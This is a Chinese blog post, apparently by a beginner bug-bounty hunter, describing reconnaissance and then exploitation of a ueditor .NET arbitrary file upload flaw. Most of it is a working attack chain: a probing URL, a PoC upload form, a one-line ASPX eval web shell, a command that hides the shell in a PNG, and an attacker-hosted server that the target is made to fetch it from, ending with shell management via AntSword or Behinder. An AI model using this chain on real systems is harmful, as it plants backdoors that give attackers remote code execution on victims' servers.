记录信息收集后的SRC实战

前言

兜兜转转的快要实习了,自己却还是萌新,杂七杂八自学网络安全快半年了吧,零散学习了很多方面的知识,写博客也是为了让自己建立一个知识体系,后续还会接着把web常见漏洞以及内网渗透等其他写完,反正会一直记录直到自己找不到工作。感言:自己所处大专院校一些数学建模对自己也确实没太大帮助,只是对我自己目前没有帮助,要是能灵活一些就好了,我们数学建模老师严师出高徒,就这样。

前期的信息收集

渗透测试的本质就是信息收集这句话需要自己慢慢理解,你收集的资产越多,测试的目标方向就越多,跟容易下手,前期的一些信息收集确定后面渗透测试的路有多远。

ARL(资产侦察灯塔系统)
由于昨天没有太多时间,我自己把目标就甩给了ARL进行信息收集,果然后面让我可以下手

ueditor编辑器漏洞

通过信息收集发现目标站点存在ueditor编辑,于是百度大法,搜索到了这个编辑器漏洞

ueditor任意文件上传漏洞
验证漏洞是否存在:http://xxx/ueditor/net/controller.ashx?action=catchimage
在这里插入图片描述
出现这样的情况就说明漏洞存在

直接上poc

<form action="http://xxx/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr: <input type="text" name="source[]" />p >
<input type="submit" value="Submit" />
form>

把这个保存为html在本地运行起来

记录信息收集后的SRC实战_第1张图片
然后我们再弄一个aspx图片木马

一句话aspx木马 <%@ Page Language="Jscript"%><%eval(Request.Item["888"],"unsafe");%>
网上随便找一张图片 在cmd下输入 copy 2.png/b + 1.aspx 3.png

然后把这个图片马搭在vps公网上 python -m SimpleHTTPServer 8080

上传shell
最后在我们刚刚本地的html输入框上输入 http:/xxxx:8080/444.png?.aspx
记录信息收集后的SRC实战_第2张图片

这样就可以上传了,上传成功后会返回shell路径,后续如果有目录权限直接用蚁剑或者冰蝎连接就行

你可能感兴趣的:(web安全,安全,web安全)